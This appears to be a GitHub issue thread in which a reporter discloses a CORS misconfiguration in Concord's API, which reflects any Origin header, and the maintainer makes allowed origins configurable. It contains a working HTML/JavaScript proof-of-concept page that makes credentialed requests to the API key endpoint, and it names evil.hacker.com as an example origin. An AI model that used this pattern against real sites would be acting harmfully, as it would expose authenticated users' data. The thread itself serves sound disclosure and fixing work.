Misconfigured CORS allows a malicious user to fetch api keys

[fitzpr]

Just a security issue I noticed where the accepted origins on CORS appear to be vulnerable.

If an authenticated user visits a page such as the following, the VICTIMSKEY is alerted. This could also be sent to an attacker.

<html>
   <head>
      <script>
         function cors() {
            var xhttp = new XMLHttpRequest();
                xhttp.onreadystatechange = function() {
                    if (this.readyState == 4 && this.status == 200) {
                        document.getElementById("emo").innerHTML = alert(this.responseText);
            }
         };
         xhttp.open("GET", "https://concord.endpoint.com/api/v1/apikey", true);
         xhttp.withCredentials = true;
         xhttp.send();
         }
      </script>
   </head>
   <body>
      <center>
      <h2>CORS PoC Exploit </h2>
      <h3>Show full content of page</h3>
      <div id="demo">
         <button type="button" onclick="cors()">Exploit</button>
      </div>
   </body>
</html>

[ibodrov]

I don't understand the issue.
The request returns the list of API keys for the currently authenticated user. Not the keys themselves.
Which according to the current CORS settings is allowed.

[ibodrov]

Although, I agree it might not be desirable in some (most?) cases. At very least it should be configurable.

[fitzpr]

The Access-Control-Allow-Origin headers will accept any origin as its inserting the allowed value from the origin header. Meaning that If you as a valid concord user visit my "malicious" page. I can view any XHR response in my sites logs/context (bypassing same origin policy). Important to note it works for ANY of the api calls so host information, nodes, api metadata, references to usernames etc.

e.g. Origin: https://evil.hacker.com responds with Access-Control-Allow-Origin: https://evil.hacker.com

Reference to better explain: https://medium.com/bugbountywriteup/stealing-user-details-by-exploiting-cors-c5ee86ebe7fb

CORS ACAO header shouldn't allow any requesting origin to view the responses.

[ibodrov]

Yeah, I understand how Access-Control-Allow-Origin works.
I've opened an internal PR to make it configurable, but depending on the environment it might require an additional proxy server (Nginx, Apache, anything else) to support multiple allowed origins, which is what we want in our internal use case.

Thanks!

[fitzpr]

Sorry didn't mean to suggest you didn't! Thanks for being patient with my description. If the bug qualifies for a CVE reference please me know.

[ibodrov]

I honestly don't know if it's qualifies for a CVE, but I guess it wouldn't hurt. :-)

Here's the commit that makes Access-Control-Allow-Origin configurable ab32c17

[fitzpr]

Yeah I think once the server does not blindly insert the Origin: value into the Access-Control-Allow header its fine. Should just be a regex to check its concord requesting it. Thanks alot.

[ibodrov]

@fitzpr we good with closing this issue then?

[fitzpr]

Yeah its more a config issue that a coding change. Thanks for responding.